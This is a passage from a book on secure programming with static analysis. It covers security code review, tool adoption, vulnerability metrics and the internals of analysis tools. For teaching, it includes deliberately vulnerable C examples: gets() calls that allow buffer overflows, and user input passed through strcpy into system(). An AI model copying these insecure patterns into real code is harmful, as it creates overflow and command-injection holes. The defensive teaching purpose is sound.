the feedback from the security review. Is there a large clump of issues around a particular module or a particular feature? It might be time to step back and look for design alternatives that could alleviate the problem. Alternatively, you might find that the best and most lasting fix comes in the form of additional security training. When programmers have fixed the problems identified by the review, the fixes must be verified. The form that verification takes depends on the nature of the changes. If the risks involved are not small and the changes are nontrivial, return to the review phase and take another look at the code. The back edge from step 4 to step 3 in Figure 3.1 represents this work. 54 Chapter 3 Static Analysis as Part of the Code Review Process Steer Clear of the Exploitability Trap Security review should not be about creating flashy exploits, but all too often, review teams get pulled down into exploit development. To understand why, consider the three possible verdicts that a piece of code might receive during a security review: • Obviously exploitable • Ambiguous • Obviously secure No clear dividing line exists between these cases; they form a spectrum. The endpoints on the spectrum are less trouble than the middle; obviously exploitable code needs to be fixed, and obviously secure code can be left alone. The middle case, ambiguous code, is the difficult one. Code might be ambiguous because its logic is hard to follow, because it’s difficult to determine the cases in which the code will be called, or because it’s hard to see how an attacker might be able to take advantage of the problem. The danger lies in the way reviewers treat the ambiguous code. If the onus is on the reviewer to prove that a piece of code is exploitable before it will be fixed, the reviewer will eventually make a mistake and overlook an exploitable bug. When a programmer says, “I won’t fix that unless you can prove it’s exploitable,” you’re looking at the exploitability trap. (For more ways programmers try to squirm out of making security fixes, see the sidebar “Five Lame Excuses for Not Fixing Bad Code.”) The exploitability trap is dangerous for two reasons. First, developing exploits is time consuming. The time you put into developing an exploit would almost always be better spent looking for more problems. Second, developing exploits is a skill unto itself. What happens if you can’t develop an exploit? Does it mean the defect is not exploitable, or that you simply don’t know the right set of tricks for exploiting it? Don’t fall into the exploitability trap: Get the bugs fixed! If a piece of code isn’t obviously secure, make it obviously secure. Sometimes this approach leads to a redundant safety check. Sometimes it leads to a comment that provides a verifiable way to determine that the code is okay. And sometimes it plugs an exploitable hole. Programmers aren’t always wild about the idea of changing a piece of code when no error can be demonstrated because any change brings with it the possibility of introducing a new bug. But the alternative—shipping vulnerabilities—is even less attractive. Beyond the risk that an overlooked bug might eventually lead to a new exploit is the possibility that the bug might not even need to be exploitable 3.1 Performing a Code Review 55 to cause damage to a company’s reputation. For example, a “security researcher” who finds a new buffer overflow might be able to garner fame and glory by publishing the details, even if it is not possible to build an attack around the bug [Wheeler, 2005]. Software companies sometimes find themselves issuing security patches even though all indications are that a defect isn’t exploitable. Five Lame Excuses for Not Fixing Bad Code Programmers who haven’t figured out software security come up with some inspired reasons for not fixing bugs found during security review. “I don't think that's exploitable” is the all-time winner. All the code reviewers we know have their own favorite runners-up, but here are our favorite specious arguments for ignoring security problems: 1. “I trust system administrators.” Even though I know they’ve misconfigured the software before, I know they’re going to get it right this time, so I don’t need code that verifies that my program is configured reasonably. 2. “You have to authenticate before you can access that page.” How on earth would an attacker ever get a username and a password? If you have a username and a password, you are, by definition, a good guy, so you won’t attack the system. 3. “No one would ever think to do that!” The user manual very clearly states that names can be no longer than 26 characters, and the GUI prevents you from entering any more than 26 characters. Why would I need to perform a bounds check when I read a saved file? 4. “That function call can never fail.” I’ve run it a million times on my Windows desktop. Why would it fail when it runs on the 128 processor Sun server? 5. “We didn’t intend for that to be production-ready code.” Yes, we know it’s been part of the shipping product for several years now, but when it was written, we didn’t expect it to be production ready, so you should review it with that in mind. 56 Chapter 3 Static Analysis as Part of the Code Review Process 3.2 Adding Security Review to an Existing Development Process2 It’s easy to talk about integrating security into the software development process, but it can be a tough transition to make if programmers are in the habit of ignoring security. Evaluating and selecting a static analysis tool can be the easiest part of a software security initiative. Tools can make programmers more efficient at tackling the software security problem, but tools alone cannot solve the problem. In other words, static analysis should be used as part of a secure development lifecycle, not as a replacement for a secure development lifecycle. Any successful security initiative requires that programmers buy into the idea that security is important. In traditional hierarchical organizations, that usually means a dictum from management on the importance of security, followed by one or more signals from management that security really should be taken seriously. The famous 2002 memo from Bill Gates titled “Trustworthy Computing” is a perfect example of the former. In the memo, Gates wrote: So now, when we face a choice between adding features and resolving security issues, we need to choose security. Microsoft signaled that it really was serious about security when it called a halt to Windows development in 2002 and had the entire Windows division (upward of 8,000 engineers) participate in a security push that lasted for more than two months [Howard and Lipner, 2006]. Increasingly, the arrival of a static analysis tool is part of a security push. For that reason, adoption of static analysis and adoption of an improved process for security are often intertwined. In this section, we address the hurdles related to tool adoption. Before you dive in, read the adoption success stories in the sidebar “Security Review Times Two.” Security Review Times Two Static analysis security tools are new enough that, to our knowledge, no formal studies have been done to measure their impact on the software built by large organizations. But as part of our work at Fortify, we’ve watched closely as our customers have rolled out our tools to their development teams and security organizations. Here we describe 2. This section began as an article in IEEE Security & Privacy Magazine, co-authored with Pravir Chandra and John Steven [Chandra, Chess, Steven, 2006]. 3.2 Adding Security Review to an Existing Development Process 57 the results we’ve seen at two large financial services companies. Because the companies don't want their names to be used, we'll call them “East Coast” and “West Coast.” East Coast A central security team is charged with doing code review. Before adopting a tool, the team reviewed 10 million lines of code per year. With Fortify, they are now reviewing 20 million lines of code per year. As they have gained familiarity with static analysis, they have written custom rules to enforce larger portions of their security policy. The result is that, as the tools do more of the review work, the human reviewers continue to become more efficient. In the coming year, they plan to increase the rate of review to 30 million lines of code per year without growing the size of the security team. Development groups at the company are starting to adopt the tool, too; more than 100 programmers use the tool as part of the development process, but the organization has not yet measured the impact of developer adoption on the review process. West Coast A central security team is charged with reviewing all Internet-facing applications before they go to production. In the past, it took the security team three to four weeks to perform a review. Using static analysis, the security team now conducts reviews in one to two weeks. The security team expects to further reduce the review cycle time by implementing a process wherein the development team can run the tool and submit the results to the security team. (This requires implementing safeguards to ensure that the development team runs the analysis correctly.) The target is to perform code review for most projects in one week. The security team is confident that, with the addition of source code analysis to the review process, they are now finding 100% of the issues in the categories they deem critical (such as cross-site scripting). The previous manual inspection process did not allow them to review every line of code, leaving open the possibility that some critical defects were being overlooked. Development teams are also using static analysis to perform periodic checks before submitting their code to the security team. Several hundred programmers have been equipped with the tool. The result is that the security team now finds critical defects only rarely. (In the past, finding critical defects was the norm.) This has reduced the number of schedule slips and the number of “risk-managed deployments” in which the organization is forced to field an application with known vulnerabilities. The reduction in critical defects also significantly improves policy enforcement because when a security problem does surface, it now receives appropriate attention. As a side benefit, development teams report that they routinely find non-security defects as a result of their code review efforts. 58 Chapter 3 Static Analysis as Part of the Code Review Process Adoption Anxiety All the software development organizations we’ve ever seen are at least a little bit chaotic, and changing the behavior of a chaotic system is no mean feat. At first blush, adopting a static analysis tool might not seem like much of a problem. Get the tool, run the tool, fix the problems, and you’re done. Right? Wrong. It’s unrealistic to expect attitudes about security to change just because you drop off a new tool. Adoption is not as easy as leaving a screaming baby on the doorstep. Dropping off the tool and waving goodbye will lead to objections like the ones in Table 3.1. Table 3.1 Commonly voiced objections to static analysis and their true meaning. Objection "It takes too long to run." "It has too many false positives." "It doesn't fit in to the way I work." Translation "I think security is optional, and since it requires effort, I don't want to do it." "I think security is optional, and since it requires effort, I don't want to do it." "I think security is optional, and since it requires effort, I don't want to do it." In our experience, three big questions must be answered to adopt a tool successfully. An organization’s size, along with the style and maturity of its development processes, all play heavily into the answers to these questions. None of them has a one-size-fits-all answer, so we consider the range of likely answers to each. The three questions are: • Who runs the tool? • When is the tool run? • What happens to the results? Who Runs the Tool? Ideally, it wouldn’t matter who actually runs the tool, but a number of practical considerations make it an important question, such as access to the code. Many organizations have two obvious choices: the security team or the programmers. 3.2 Adding Security Review to an Existing Development Process 59 The Security Team For this to work, you must ensure that your security team has the right skill set—in short, you want security folks with software development chops. Even if you plan to target programmers as the main consumers of the information generated by the tool, having the security team participate is a huge asset. The team brings risk management experience to the table and can often look at big-picture security concerns, too. But the security team didn’t write the code, so team members won’t have as much insight into it as the developers who did. It’s tough for the security team to go through the code alone. In fact, it can be tricky to even get the security team set up so that they can compile the code. (If the security team isn’t comfortable compiling other people’s code, you’re barking up the wrong tree.) It helps if you already have a process in place for the security team to give code-level feedback to programmers. The Programmers Programmers possess the best knowledge about how their code works. Combine this with the vulnerability details provided by a tool, and you’ve got a good reason to allow development to run the operation. On the flip side, programmers are always under pressure to build a product on a deadline. It’s also likely that, even with training, they won’t have the same level of security knowledge or expertise as members of the security team. If the programmers will run the tool, make sure they have time built into their schedule for it, and make sure they have been through enough security training that they’ll be effective at the job. In our experience, not all programmers will become tool jockeys. Designate a senior member of each team to be responsible for running the tool, making sure the results are used appropriately, and answering tool-related questions from the rest of the team. All of the Above A third option is to have programmers run the tools in a mode that produces only high-confidence results, and use the security team to conduct more thorough but less frequent reviews. This imposes less of a burden on the programmers, while still allowing them to catch some of their own mistakes. It also encourages interaction between the security team and the development team. No question about it, joint teams work best. Every so 60 Chapter 3 Static Analysis as Part of the Code Review Process often, buy some pizzas and have the development team and the security team sit down and run the tool together. Call it eXtreme Security, if you like. When Is the Tool Run? More than anything else, deciding when the tool will be run determines the way the organization approaches security review. Many possible answers exist, but the three we see most often are these: while the code is being written, at build time, and at major milestones. The right answer depends on how the analysis results will be consumed and how much time it takes to run the tool. While the Code Is Being Written Studies too numerous to mention have shown that the cost of fixing a bug increases over time, so it makes sense to check new code promptly. One way to accomplish this is to integrate the source code analysis tool into the programmer’s development environment so that the programmer can run ondemand analysis and gain expertise with the tool over time. An alternate method is to integrate scanning into the code check-in process, thereby centralizing control of the analysis. (This approach costs the programmers in terms of analysis freedom, but it’s useful when desktop integration isn’t feasible.) If programmers will run the tool a lot, the tool needs to be fast and easy to use. For large projects, that might mean asking each developer to analyze only his or her portion of the code and then running an analysis of the full program at build time or at major milestones. At Build Time For most organizations, software projects have a well-defined build process, usually with regularly scheduled builds. Performing analysis at build time gives code reviewers a reliable report to use for direct remediation, as well as a baseline for further manual code inspection. Also, by using builds as a timeline for source analysis, you create a recurring, consistent measure of the entire project, which provides perfect input for analysis-driven metrics. This is a great way to get information to feed a training program. At Major Milestones Organizations that rely on heavier-weight processes have checkpoints at project milestones, generally near the end of a development cycle or at some large interval during development. These checkpoints sometimes include 3.2 Adding Security Review to an Existing Development Process 61 security-related tasks such as a design review or a penetration test. Logically extending this concept, checkpoints seem like a natural place to use a static analysis tool. The down side to this approach is that programmers might put off thinking about security until the milestone is upon them, at which point other milestone obligations can push security off to the sidelines. If you’re going to wait for milestones to use static analysis, make sure you build some teeth into the process. The consequences for ignoring security need to be immediately obvious and known to all ahead of time. What Happens to the Results? When people think through the tool adoption process, they sometimes forget that most of the work comes after the tool is run. It’s important to decide ahead of time how the actual code review will be performed. Output Feeds a Release Gate The security team processes and prioritizes the tool’s output as part of a checkpoint at a project milestone. The development team receives the prioritized results along with the security team’s recommendations about what needs to be fixed. The development team then makes decisions about which problems to fix and which to classify as “accepted risks.” (Development teams sometimes use the results from a penetration test the same way.) The security team should review the development team’s decisions and escalate cases where it appears that the development team is taking on more risk than it should. If this type of review can block a project from reaching a milestone, the release gate has real teeth. If programmers can simply ignore the results, they will have no motivation to make changes. The gate model is a weak approach to security for the same reason that penetration testing is a weak approach to security: It’s reactive. Even though the release gate is not a good long-term solution, it can be an effective stepping stone. The hope is that the programmers will eventually get tired of having their releases waylaid by the security team and decide to take a more proactive approach. A Central Authority Doles Out Individual Results A core group of tool users can look at the reported problems for one or more projects and pick the individual issues to send to the programmers responsible for the code in question. In such cases, the static analysis tools should report everything it can; the objective is to leave no stone unturned. 62 Chapter 3 Static Analysis as Part of the Code Review Process False positives are less of a concern because a skilled analyst processes the results prior to the final report. With this model, the core group of tool users becomes skilled with the tools in short order and becomes adept at going through large numbers of results. A Central Authority Sets Pinpoint Focus Because of the large number of projects that might exist in an organization, a central distribution approach to results management can become constrained by the number of people reviewing results, even if reviewers are quite efficient. However, it is not unusual for a large fraction of the acute security pain to be clustered tightly around just a small number of types of issues. With this scenario, the project team will limit the tool to a small number of specific problem types, which can grow or change over time according to the risks the organization faces. Ultimately, defining a set of inscope problem types works well as a centrally managed policy, standard, or set of guidelines. It should change only as fast as the development team can adapt and account for all the problems already in scope. On the whole, this approach gives people the opportunity to become experts incrementally through hands-on experience with the tool over time. Start Small, Ratchet Up Security tools tend to come preconfigured to detect as much as they possibly can. This is really good if you’re trying to figure out what a tool is capable of detecting, but it can be overwhelming if you’re assigned the task of going through every issue. No matter how you answer the adoption questions, our advice here is the same: Start small. Turn off most of the things the tool detects and concentrate on a narrow range of important and well-understood problems. Broaden out only when there’s a process in place for using the tool and the initial batch of problems is under control. No matter what you do, a large body of existing code won’t become perfect overnight. The people in your organization will thank you for helping them make some prioritization decisions. 3.3 Static Analysis Metrics Metrics derived from static analysis results are useful for prioritizing remediation efforts, allocating resources among multiple projects, and getting feedback on the effectiveness of the security process. Ideally, one could use 3.3 Static Analysis Metrics 63 metrics derived from static analysis results to help quantify the amount of risk associated with a piece of code, but using tools to measure risk is tricky. The most obvious problem is the unshakable presence of false positives and false negatives, but it is possible to compensate for them. By manually auditing enough results, a security team can predict the rate at which false positives and false negatives occur for a given project and extrapolate the number of true positives from a set of raw results. A deeper problem with using static analysis to quantify risk is that there is no good way to sum up the risk posed by a set of vulnerabilities. Are two buffer overflows twice as risky as a single buffer overflow? What about ten? Code-level vulnerabilities identified by tools simply do not sum into an accurate portrayal of risk. See the sidebar “The Density Deception” to understand why. Instead of trying to use static analysis output to directly quantify risk, use it as a tactical way to focus security efforts and as an indirect measure of the process used to create the code. The Density Deception In the quality assurance realm, it’s normal to compute the defect density for a piece of code by dividing the number of known bugs by the number of lines of code. Defect density is often used as a measure of quality. It might seem intuitive that one could use static analysis output to compute a “vulnerability density” to measure the amount of risk posed by the code. It doesn’t work. We use two short example programs with some blatant vulnerabilities to explain why. First up is a straight-line program: 1 /* This program computes Body Mass Index (BMI). */ 2 int main(int argc, char** argv) 3{ 4 char heightString[12]; 5 char weightString[12]; 6 int height, weight; 7 float bmi; 8 9 printf("Enter your height in inches: "); 10 gets(heightString); 11 printf("Enter your weight in pounds: "); 12 gets(weightString); 13 height = atoi(heightString); 14 weight = atoi(weightString); 15 bmi = ((float)weight/((float)height*height)) * 703.0; 16 17 printf("\nBody mass index is %2.2f\n\n", bmi); 18 } Continues 64 Chapter 3 Static Analysis as Part of the Code Review Process Continued The program has 18 lines, and any static analysis tool will point out two glaring buffer overflow vulnerabilities: the calls to gets() on lines 10 and 12. Divide 2 by 18 for a vulnerability density of 0.111. Now consider another program that performs exactly the same computation: 1 /* This program computes Body Mass Index (BMI). */ 2 int main(int argc, char** argv) 3{ 4 int height, weight; 5 float bmi; 6 7 height = getNumber("Enter your height in inches"); 8 weight = getNumber("Enter your weight in pounds"); 9 bmi = ((float)weight/((float)height*height)) * 703.0; 10 11 printf("\nBody mass index is %2.2f\n\n", bmi); 12 } 13 14 int getNumber(char* prompt) { 15 char buf[12]; 16 printf("%s: ", prompt); 17 return atoi(gets(buf)); 18 } This program calls gets(), too, but it uses a separate function to do it. The result is that a static analysis tool will report only one vulnerability (the call to gets() on line 17). Divide 1 by 18 for a vulnerability density of 0.056. Whoa. The second program is just as vulnerable as the first, but its vulnerability density is 50% smaller! The moral to the story is that the way the program is written has a big impact on the vulnerability density. This makes vulnerability density completely meaningless when it comes to quantifying risk. (Stay tuned. Even though vulnerability density is terrible in this context, the next section describes a legitimate use for it.) Metrics for Tactical Focus Many simple metrics can be derived from static analysis results. Here we look at the following: • Measuring vulnerability density • Comparing projects by severity • Breaking down results by category • Monitoring trends 3.3 Static Analysis Metrics 65 Measuring Vulnerability Density We’ve already thrown vulnerability density under the bus, so what more is there to talk about? Dividing the number of static analysis results by the number of lines of code is an awful way to measure risk, but it’s a good way to measure the amount of work required to do a complete review. Comparing vulnerability density across different modules or different projects helps formulate review priorities. Track issue density over time to gain insight into whether tool output is being taken into consideration. Comparing Projects by Severity Static analysis results can be applied for project comparison purposes. Figure 3.3 shows a comparison between two modules, with the source code analysis results grouped by severity. The graph suggests a plan of action: Check out the critical issues for the first module, and then move on to the high-severity issues for the second. Comparing projects side by side can help people understand how much work they have in front of them and how they compare to their peers. When you present project comparisons, name names. Point fingers. Sometimes programmers need a little help accepting responsibility for their code. Help them. 50 Orion Project Tilde Project 40 Issues 30 20 10 0 Critical High Medium Low Severity Figure 3.3 Source code analysis results broken down by severity for two subprojects. 66 Chapter 3 Static Analysis as Part of the Code Review Process Breaking Down Results by Category Figure 3.4 presents results for a single project grouped by category. The pie chart gives a rough idea about the amount of remediation effort required to address each type of issue. It also suggests that log forging and cross-site scripting are good topics for an upcoming training class. Log Forging (12) Cross-Site Scripting (12) Privacy Violation (3) Race Condition (2) Password Management (1) Figure 3.4 Source code analysis results broken down by category. Source code analysis results can also point out trends over time. Teams that are focused on security will decrease the number of static analysis findings in their code. A sharp increase in the number of issues found deserves attention. Figure 3.5 shows the number of issues found during a series of nightly builds. For this particular project, the number of issues found on February 2 spikes because the development group has just taken over a module from a group that has not been focused on security. 50 40 30 Issues 20 10 0 29-Jan 30-Jan 31-Jan 1-Feb Date 2-Feb 3-Feb 4-Feb Figure 3.5 Source code analysis results from a series of nightly builds. The spike in issues on February 2 reflects the incorporation of a module originally written by a different team. 3.3 Static Analysis Metrics 67 Process Metrics The very presence of some types of issues can serve as an early indicator of more widespread security shortcomings [Epstein, 2006]. Determining the kinds of issues that serve as bellwether indicators requires some experience with the particular kind of software being examined. In our experience, a large number of string-related buffer overflow issues is a sign of trouble for programs written in C. More sophisticated metrics leverage the capacity of the source code analyzer to give the same issue the same identifier across different builds. (See Chapter 4, “Static Analysis Internals,” for more information on issue identifiers.) By following the same issue over time and associating it with the feedback provided by a human auditor, the source code analyzer can provide insight into the evolution of the project. For example, static analysis results can reveal the way a development team responds to security vulnerabilities. After an auditor identifies a vulnerability, how long, on average, does it take for the programmers to make a fix? We call this vulnerability dwell. Figure 3.6 shows a project in which the programmers fix critical vulnerabilities within two days and take progressively longer to address less severe problems. Critical Vulnerability Dwell 2 Severity High 4 Medium 25 Low 60 1 10 100 Days Figure 3.6 Vulnerability dwell as a function of severity. When a vulnerability is identified, vulnerability dwell measures how long it remains in the code. (The x-axis uses a log scale.) 68 Chapter 3 Static Analysis as Part of the Code Review Process Static analysis results can also help a security team decide when it’s time to audit a piece of code. The rate of auditing should keep pace with the rate of development. Better yet, it should keep pace with the rate at which potential security issues are introduced into the code. By tracking individual issues over time, static analysis results can show a security team how many unreviewed issues a project contains. Figure 3.7 presents a typical graph. At the point the project is first reviewed, audit coverage goes to 100%. Then, as the code continues to evolve, the audit coverage decays until the project is audited again. Another view of this same data gives a more comprehensive view of the project. An audit history shows the total number of results, number of results reviewed, and number of vulnerabilities identified in each build. This view takes into account not just the work of the code reviewers, but the effect the programmers have on the project. Figure 3.8 shows results over roughly one month of nightly builds. At the same time the code review is taking place, development is in full swing, so the issues in the code continue to change. As the auditors work, they report vulnerabilities (shown in black). 100% Percent Issues Reviewed 50% 0% 1-Jan 1-Feb 1-Mar 1-Apr Date Figure 3.7 Audit coverage over time. After all static analysis results are reviewed, the code continues to evolve and the percentage of reviewed issues begins to decline. Summary 69 250 200 Issues 150 Total Issues Found Issues Reviewed 100 Vulnerabilities 50 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 Build Number Figure 3.8 Audit history: the total number of static analysis results, the number of reviewed results, and the number of identified vulnerabilities present in the project. Around build 14, the auditors have looked at all the results, so the total number of results is the same as the number reviewed. Development work is not yet complete, though, and soon the project again contains unreviewed results. As the programmers respond to some of the vulnerabilities identified by the audit team, the number of results begins to decrease and some of the identified vulnerabilities are fixed. At the far-right side of the graph, the growth in the number of reviewed results indicates that reviewers are beginning to look at the project again. Summary Building secure systems takes effort, especially for organizations that aren’t used to paying much attention to security. Code review should be part of the software security process. When used as part of code review, static analysis tools can help codify best practices, catch common mistakes, and generally make the security process more efficient and consistent. But to achieve these benefits, an organization must have a well-defined code review process. At a high level, the process consists of four steps: defining goals, running tools, reviewing the code, and making fixes. One symptom of an ineffective process is a frequent descent into a debate about exploitability. 70 Chapter 3 Static Analysis as Part of the Code Review Process To incorporate static analysis into the existing development process, an organization needs a tool adoption plan. The plan should lay out who will run the tool, when they’ll run it, and what will happen to the results. Static analysis tools are process agnostic, but the path to tool adoption is not. Take style and culture into account as you develop an adoption plan. By tracking and measuring the security activities adopted in the development process, an organization can begin to sharpen its software security focus. The data produced by source code analysis tools can be useful for this purpose, giving insight into the kinds of problems present in the code, whether code review is taking place, and whether the results of the review are being acted upon in a timely fashion. 4 Static Analysis Internals Those who say it cannot be done should not interrupt the people doing it. —Chinese proverb This chapter is about what makes static analysis tools tick. We look at the internal workings of advanced static analysis tools, including data structures, analysis techniques, rules, and approaches to reporting results. Our aim is to explain enough about what goes into a static analysis tool that you can derive maximum benefit from the tools you use. For readers interested in creating their own tools, we hope to lay enough groundwork to provide a reasonable starting point. Regardless of the analysis techniques used, all static analysis tools that target security function in roughly the same way, as shown in Figure 4.1. They all accept code, build a model that represents the program, analyze that model in combination with a body of security knowledge, and finish by presenting their results back to the user. This chapter walks through the process and takes a closer look at each step. Source if ( fgets ( buf , sizeof(buf) Code stdin) == buf ) { strcpy ( othr , buf ); system ( othr ); Build Model Perform Analysis Present Results Security Knowledge Figure 4.1 A block diagram for a generic static analysis security tool. At a high level, almost all static analysis security tools work this way. 71 72 Chapter 4 Static Analysis Internals 4.1 Building a Model The first thing a static analysis tool needs to do is transform the code to be analyzed into a program model, a set of data structures that represent the code. As you would expect, the model a tool creates is closely linked to the kind of analysis it performs, but generally static analysis tools borrow a lot from the compiler world. In fact, many static analysis techniques were developed by researchers working on compilers and compiler optimization problems. If you are interested in an in-depth look at compilers, we recommend both the classic textbook Compilers: Principles, Techniques, and Tools (often called “the dragon book”), by Aho, Sethi, and Ullman [Aho et al., 2006], and Appel’s Modern Compiler Implementation series (often called “the tiger books”) [Appel, 1998]. We now take a brief tour of the most important techniques and data structures that compilers and static analysis tools share. Lexical Analysis Tools that operate on source code begin by transforming the code into a series of tokens, discarding unimportant features of the program text such as whitespace or comments along the way. The creation of the token stream is called lexical analysis. Lexing rules often use regular expressions to identify tokens. Example 4.1 gives a simple set of lexing rules that could be used to process the following C program fragment: if (ret) // probably true mat[x][y] = END_VAL; This code produces the following sequence of tokens: IF LPAREN ID(ret) RPAREN ID(mat) LBRACKET ID(x) RBRACKET LBRACKET ID(y) RBRACKET EQUAL ID(END_VAL) SEMI Notice that most tokens are represented entirely by their token type, but to be useful, the ID token requires an additional piece of information: the name of the identifier. To enable useful error reporting later, tokens should carry at least one other kind of information with them: their position in the source text (usually a line number and a column number). For the simplest of static analysis tools, the job is nearly finished at this point. If all the tool is going to do is match the names of dangerous functions, the analyzer can go through the token stream looking for identifiers, 4.1 Building a Model 73 match them against a list of dangerous function names, and report the results. This is the approach taken by ITS4, RATS, and Flawfinder. Example 4.1 Sample lexical analysis rules. if ( ) [ ] = ; /[ \t\n]+/ /\/\/.*/ /[a-zA-Z][a-zA-Z0-9]*"/ { return IF; } { return LPAREN; } { return RPAREN; } { return LBRACKET; } { return LBRACKET; } { return EQUAL; } { return SEMI; } { /* ignore whitespace */ } { /* ignore comments */ } { return ID; } Parsing A language parser uses a context-free grammar (CFG) to match the token stream. The grammar consists of a set of productions that describe the symbols (elements) in the language. Example 4.2 lists a set of productions that are capable of parsing the sample token stream. (Note that the definitions for these productions would be much more involved for a full-blown language parser.) Example 4.2 Production rules for parsing the sample token stream. stmt := if_stmt | assign_stmt if_stmt := IF LPAREN expr RPAREN stmt expr := lval assign_stmt := lval EQUAL expr SEMI lval = ID | arr_access arr_access := ID arr_index+ arr_idx := LBRACKET expr RBRACKET The parser performs a derivation by matching the token stream against the production rules. If each symbol is connected to the symbol from which it was derived, a parse tree is formed. Figure 4.2 shows a parse tree created using the production rules from Example 4.2. We have omitted terminal symbols that do not carry names (IF, LPAREN, RPAREN, etc.), to make the salient features of the parse tree more obvious. 74 Chapter 4 Static Analysis Internals stmt if_stmt expr stmt lval assign_stmt ID(ret) lval expr arr_access lval ID(mat) arr_idx arr_idx ID(END_VAL) expr expr lval lval ID(x) ID(y) Figure 4.2 A parse tree derived from the sequence of tokens. If you would like to build your own parser, the venerable UNIX programs Lex and Yacc have been the traditional way to start in C; if you can choose any language you like, we prefer JavaCC ( because it’s all-around easier to use and comes complete with a grammar for parsing Java. For C and C++, the Edison Design Group (EDG) ( sells an excellent front end. EDG sometimes makes its toolkit available for free for academic use. The open source Elsa C and C++ parser from U.C. Berkeley is another good option (http:// Abstract Syntax It is feasible to do significant analysis on a parse tree, and certain types of stylistic checks are best performed on a parse tree because it contains the most direct representation of the code just as the programmer wrote it. However, performing complex analysis on a parse tree can be inconvenient for a number of reasons. The nodes in the tree are derived directly from the grammar’s production rules, and those rules can introduce nonterminal 4.1 Building a Model 75 symbols that exist purely for the purpose of making parsing easy and nonambiguous, rather than for the purpose of producing an easily understood tree; it is generally better to abstract away both the details of the grammar and the syntactic sugar present in the program text. A data structure that does these things is called an abstract syntax tree (AST). The purpose of the AST is to provide a standardized version of the program suitable for later analysis. The AST is usually built by associating tree construction code with the grammar’s production rules. Figure 4.3 shows an AST for our example. Notice that the if statement now has an empty else branch, the predicate tested by the if is now an explicit comparison to zero (the behavior called for by C), and array access is uniformly represented as a binary operation. if_stmt NOT assign_stmt COMPARE_EQ ID(ret) arr_idx 0 arr_idx ID(y) ID(mat) ID(x) Figure 4.3 An abstract syntax tree. ID(END_VAL) NO_OP Depending on the needs of the system, the AST can contain a more limited number of constructs than the source language. For example, method calls might be converted to function calls, or for and do loops might be converted to while loops. Significant simplification of the program in this fashion is called lowering. Languages that are closely related, such as C and C++, can be lowered into the same AST format, although such lowering runs the risk of distorting the programmer’s intent. Languages that are syntactically similar, such as C++ and Java, might share many of the same AST node types but will almost undoubtedly have special kinds of nodes for features found in only one language. 76 Chapter 4 Static Analysis Internals Semantic Analysis As the AST is being built, the tool builds a symbol table alongside it. For each identifier in the program, the symbol table associates the identifier with its type and a pointer to its declaration or definition. With the AST and the symbol table, the tool is now equipped to perform type checking. A static analysis tool might not be required to report typechecking errors the way a compiler does, but type information is critically important for the analysis of an object-oriented language because the type of an object determines the set of methods that the object can invoke. Furthermore, it is usually desirable to at least convert implicit type conversions in the source text into explicit type conversions in the AST. For these reasons, an advanced static analysis tool has to do just as much work related to type checking as a compiler does. In the compiler world, symbol resolution and type checking are referred to as semantic analysis because the compiler is attributing meaning to the symbols found in the program. Static analysis tools that use these data structures have a distinct advantage over tools that do not. For example, they can correctly interpret the meaning of overloaded operators in C++ or determine that a Java method named doPost() is, in fact, part of an implementation of HttpServlet. These capabilities enable a tool to perform useful checks on the structure of the program. We use the term structural analysis for these kinds of checks. For more, see the sidebar “Checking Structural Rules.” After semantic analysis, compilers and more advanced static analysis tools part ways. A modern compiler uses the AST and the symbol and type information to generate an intermediate representation, a generic version of machine code that is suitable for optimization and then conversion into platform-specific object code. The path for static analysis tools is less clear cut. Depending on the type of analysis to be performed, a static analysis tool might perform additional transformations on the AST or might generate its own variety of intermediate representation suitable to its needs. If a static analysis tool uses its own intermediate representation, it generally allows for at least assignment, branching, looping, and function calls (although it is possible to handle function calls in a variety of ways—we discuss function calls in the context of interprocedural analysis in Section 4.4). The intermediate representation that a static analysis tool uses is usually a higher-level view of the program than the intermediate representation that a compiler uses. For example, a C language compiler likely will convert all references to structure fields into byte offsets into the structure for its intermediate representation, while a static analysis tool more likely will continue to refer to structure fields by their names. 4.1 Building a Model 77 Checking Structural Rules While he was an intern at Fortify, Aaron Siegel created a language for describing structural program properties. In the language, a property is defined by a target AST node type and a predicate that must be true for an instance of that node type to match. Two examples follow. In Java, database connections should not be shared between threads; therefore, database connections should not be stored in static fields. To find static fields that hold database connections, we write Field: static and == "java.sql.Connection" In C, the statement buf = realloc(buf, 256); causes a memory leak if realloc() fails and returns null. To flag such statements, we write FunctionCall c1: ( c1.function is [name == "realloc"] and c1 in [AssignmentStatement: rhs is c1 and lhs == c1.arguments[0] ] ) Tracking Control Flow Many static analysis algorithms (and compiler optimization techniques) explore the different execution paths that can take place when a function is executed. To make these algorithms efficient, most tools build a control flow graph on top of the AST or intermediate representation. The nodes in a control flow graph are basic blocks: sequences of instructions that will always be executed starting at the first instruction and continuing to the last instruction, without the possibility that any instructions will be skipped. Edges in the control flow graph are directed and represent potential control flow paths between basic blocks. Back edges in a control flow graph represent potential loops. Consider the C fragment in Example 4.3. 78 Chapter 4 Static Analysis Internals Example 4.3 A C program fragment consisting of four basic blocks. if (a > b) { nConsec = 0; } else { s1 = getHexChar(1); s2 = getHexChar(2); } return nConsec; Figure 4.4 presents the control flow graph for the fragment. The four basic blocks are labeled bb0 through bb3. In the example, the instructions in each basic block are represented in source code form, but a basic block data structure in a static analysis tool would likely hold pointers to AST nodes or the nodes for the tool’s intermediate representation. When a program runs, its control flow can be described by the series of basic blocks it executes. A trace is a sequence of basic blocks that define a path through the code. There are only two possible execution paths through the code in Example 4.3 (the branch is either taken or not). These paths are represented by two unique traces through the control flow graph in Figure 4.4: [ bb0, bb1, bb3 ] and [ bb0, bb2, bb3 ]. bb0 if (a > b) bb1 nConsec = 0; bb2 s1 = getHexChar(a); s2 = getHexChar(b); bb3 return nConsec; Figure 4.4 A control flow graph with four basic blocks. A call graph represents potential control flow between functions or methods. In the absence of function pointers or virtual methods, constructing a 4.1 Building a Model 79 call graph is simply a matter of looking at the function identifiers referenced in each function. Nodes in the graph represent functions, and directed edges represent the potential for one function to invoke another. Example 4.4 shows a program with three functions, and Figure 4.5 shows its call graph. The call graph makes it clear that larry can call moe or curly, and moe can call curly or call itself again recursively. Example 4.4 A short program with three functions. int larry(int fish) { if (fish) { moe(1); } else { curly(); } } int moe(int scissors) { if (scissors) { curly(); moe(0); } else { curly(); } } int curly() { /* empty */ } larry moe curly Figure 4.5 The call graph for the program in Example 4.4. 80 Chapter 4 Static Analysis Internals When function pointers or virtual methods are invoked, the tool can use 